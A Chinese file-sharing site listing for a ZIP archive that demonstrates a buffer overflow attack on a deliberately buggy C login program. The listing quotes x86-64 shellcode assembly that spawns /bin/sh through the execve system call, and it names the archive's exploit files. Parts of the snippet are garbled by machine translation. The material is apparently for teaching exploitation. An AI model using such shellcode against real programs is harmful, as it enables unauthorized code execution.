没有合适的资源?快使用搜索试试~ 我知道了~
Buffer-Overflow:一个简单的缓冲区溢出攻击来破解一个用 C 编写的天真的错误登录程序的简单说明
共8个文件
c:4个
s:1个
md:1个
需积分: 50 2 下载量 40 浏览量
2021-07-01
14:26:57
上传
评论
收藏 4KB ZIP 举报
温馨提示
缓冲区溢出 缓冲区溢出攻击的简单说明,用于破解一个用 C 编写的幼稚的错误登录程序,并使用 shell 代码生成一个交互式 shell。 攻击方法 下面一段汇编代码用作shellcode: Needle0: jmp here: pop %rdi xor %rax, %rax movb $0x3b, %al xor %rsi, %rsi xor %rdx, %rdx 系统调用那里: call here .string "/bin/sh"needle1: .octa 0x死牛肉 在上面的汇编代码中,字符串“/bin/sh”放在调用之后,以便在调用后将其压入堆栈。 然后将其弹出到 rdi 上。 经过一些工作,最终调用中断,并使用“execv”系统调用或“0x3b 系统调用号”将外壳加载到内存中。 参考: : 这个 shell 代码的对象转储被获取并在程序中适当地溢出,如下所述。 缓冲
资源推荐
资源详情
资源评论
收起资源包目录
Buffer-Overflow-master.zip (8个子文件)
Buffer-Overflow-master
badbuf_dummy.c 615B
shinit.c 102B
generate_input.py 602B
README.md 3KB
shell.c 306B
makefile 298B
exec_shell.s 559B
badbuf.c 576B
共 8 条
- 1
资源评论
传奇panda
- 粉丝: 23
- 资源: 4581
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功